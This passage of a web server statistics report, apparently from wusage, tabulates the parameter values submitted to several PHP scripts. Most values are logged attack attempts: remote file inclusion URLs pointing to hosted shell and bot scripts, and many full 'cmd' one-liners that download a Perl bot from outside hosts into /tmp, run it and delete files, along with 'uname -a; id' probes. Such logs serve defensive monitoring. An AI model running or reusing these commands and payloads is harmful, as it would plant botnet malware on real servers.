| http://www.freewebs.com/yahwek/phpbot.txt? |
20 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
20 |
| http://www.fabiofotografo.com.br/js/var.txt? |
18 |
| Parameter |
xroot
|
| Value | Accesses |
| www.popcorn.de/cmd? |
1 |
| OTHER: |
2,104 |
| Script | Total Accesses |
/wusage/summary/cgi.html//components/com_galleria/galleria.h
tml.php
|
2,256
|
| Parameters by Submitted Value |
| Parameter |
cmd
|
| Value | Accesses |
| uname -a; id |
20 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
13 |
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt |
11 |
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c
om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/
srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg
et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm
srz.txt |
7 |
| id |
6 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt |
6 |
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt |
6 |
cd /tmp;rm enviar.txt;wget http://br.geocities.com/svconts/e
nviar.txt;fetch http://br.geocities.com/svconts/enviar.txt;l
wp-download http://br.geocities.com/svconts/enviar.txt;curl
-O http://br.geocities.com/svconts/enviar.txt;lynx http://br
.geocities.com/svconts/enviar.txt;perl enviar.txt |
3 |
cd /tmp;killall perl -9;rm -rf *.txt;GET http://geocities.ya
hoo.com.br/zcrew99/alan.txt > alan.txt;perl alan.txt;rm alan
.txt |
3 |
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt* |
3 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
13 |
| Parameter |
mosConfig_absolute_path
|
| Value | Accesses |
| http://ownsirc.googlepages.com/botnet.txt? |
41 |
| http://www.jungo8949.co.kr/tool25.txt? |
34 |
| http://invisionar.hostinggratisargentina.com/eth0? |
29 |
| http://www.freewebs.com/yahwek/sete.txt? |
28 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
27 |
| http://normanzito.iespana.es/http.txt?? |
24 |
|
22 |
| http://usuarios.arnet.com.ar/larry123/exploit.txt? |
21 |
| http://208.74.174.183/brizola.txt? |
20 |
http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt
?? |
20 |
| OTHER: |
1,899 |
| Script | Total Accesses |
/wusage/summary/cgi.html//components/com_extcalendar/admin_e
vents.php
|
2,192
|
| Parameters by Submitted Value |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR
|
| Value | Accesses |
|
1 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]
|
| Value | Accesses |
|
5 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR] http://human-design.ru/adm/faqsupp
ort/config/tester.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR] http://www.apocalypticduck.com/ski
ns/advanced/config/tester.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR] http://x-tal.ajou.ac.kr/zeroboard/
skin/zero_vote/tester.txt?
|
| Value | Accesses |
|
2 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]
|
| Value | Accesses |
| http://ch3z.max-host.pl/z/z/k.txt? |
138 |
| http://www.jungo8949.co.kr/tool25.txt? |
74 |
| http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt? |
43 |
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?
|
37 |
| http://invisionar.hostinggratisargentina.com/eth0? |
34 |
|
33 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
28 |
| http://ownsirc.googlepages.com/botnet.txt? |
27 |
| http://chez.ugu.pl/z/z/k.txt? |
26 |
| http://www.freewebtown.com/johnkid/tester.txt? |
26 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]\r
|
| Value | Accesses |
|
2 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]http://211.236.244.133/~axlonaxlon/
shell.txt?
|
| Value | Accesses |
|
3 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]http://82.195.129.64/~magnadon/shel
l.txt?
|
| Value | Accesses |
|
1 |
| Parameter |
CONFIG_EXT[LANGUAGES_DIR]http://abdclub.com/xcart/guide/work
ing_with_orders.txt?
|
| Value | Accesses |
|
1 |
| OTHER: |
1,709 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html//transcripts.php
|
2,024
|
| Parameters by Submitted Value |
| Parameter |
action
|
| Value | Accesses |
| view |
159 |
| http://ownsirc.googlepages.com/botnet.txt? |
30 |
| http://www.freewebs.com/yahwek/phpbot.txt? |
28 |
| http://www.oslutadores.com/?id=23530 |
28 |
| http://www.jungo8949.co.kr/tool25.txt? |
23 |
|
20 |
| http://www.neoncomanda.kit.net/tool25.dat? |
18 |
| http://www.pucorp.t5.com.br/lp.txt? |
18 |
| http://yahwek.dll.googlepages.com/phpbot.txt? |
16 |
| http://204.11.228.115/id.txt? |
15 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt |
12 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
11 |
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt |
8 |
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt* |
7 |
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt |
6 |
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt |
5 |
| uname -a; id |
5 |
cd /tmp;rm x.txt;wget http://www.killersofdragons.com/x.txt;
fetch http://www.killersofdragons.com/x.txt;lwp-download htt
p://www.killersofdragons.com/x.txt;curl -O http://www.killer
sofdragons.com/x.txt;lynx http://www.killersofdragons.com/x.
txt;perl x.txt |
5 |
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt? |
3 |
cd /tmp;rm s1t2a3r4t.txt;wget http://189.24.101.97:9090/s1t2
a3r4t.txt;fetch http://189.24.101.97:9090/s1t2a3r4t.txt;lwp-
download http://189.24.101.97:9090/s1t2a3r4t.txt;curl -O htt
p://189.24.101.97:9090/s1t2a3r4t.txt;lynx http://189.24.101.
97:9090/s1t2a3r4t.txt;perl s1t2a3r4t.txt;rm s1t2a3r4t.txt |
3 |
| Parameter |
deptid
|
| Value | Accesses |
| 1 |
155 |
| http://204.11.228.115/id.txt? |
4 |
| Parameter |
list
|
| Value | Accesses |
| 1 |
1 |
| Parameter |
search_string
|
| Value | Accesses |
| http://www.fabiofotografo.com.br/js/var.txt?? |
26 |
| http://www.jungo8949.co.kr/tool25.txt? |
23 |
| http://201.37.71.117:8090/tool25.txt? |
5 |
| http://usuarios.arnet.com.ar/larry123/safe.txt? |
4 |
| http://proxysx.t35.com/x0.txt? |
4 |
| http://204.11.228.115/id.txt? |
4 |
| http://xsenharox.xpg.com.br/e_sempre_nois.txt? |
4 |
| http://www.chamala.kit.net/tool25.txt? |
4 |
| http://piuri.net/images/logo3.gif?? |
3 |
| http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt? |
3 |
| Parameter |
userid
|
| Value | Accesses |
| 0 |
155 |
| OTHER: |
1,209 |
| Script | Total Accesses |
|
/wusage/summary/cgi.html//phplive/setup/header.php
|
2,016
|
| Parameters by Submitted Value |
| Parameter |
?v
|
| Value | Accesses |
|
1 |
| Parameter |
cmd
|
| Value | Accesses |
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt* |
17 |
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt |
13 |
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt |
11 |
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p
erl botx2.txt;rm -rf *txt* |
11 |
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt |
10 |
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p
erl botx.txt;rm -rf *botx* |
10 |
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt* |
9 |
| uname -a; id |
8 |
cd /tmp;wget http://208.100.59.56/nanaozin.txt;curl -O -f ht
tp://208.100.59.56/nanaozin.txt;lynx -source http://208.100.
59.56/nanaozin.txt;lwp-rget http://208.100.59.56/nanaozin.tx
t;fetch http://208.100.59.56/nanaozin.txt;perl nanaozin.txt;
rm -rf nanaozin.txt |
7 |
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt |
7 |
| Parameter |
css_path
|
| Value | Accesses |
| http://www.jungo8949.co.kr/tool25.txt? |
76 |
| http://h1.ripway.com/tsk4/cmd.txt? |
40 |
| http://catholique-sartrouville-78.cef.fr/IMG/dna.txt |
33 |
| http://houdateamo.altervista.org/dna.txt |
28 |
| http://yahwek.dll.googlepages.com/phpbot.txt? |
27 |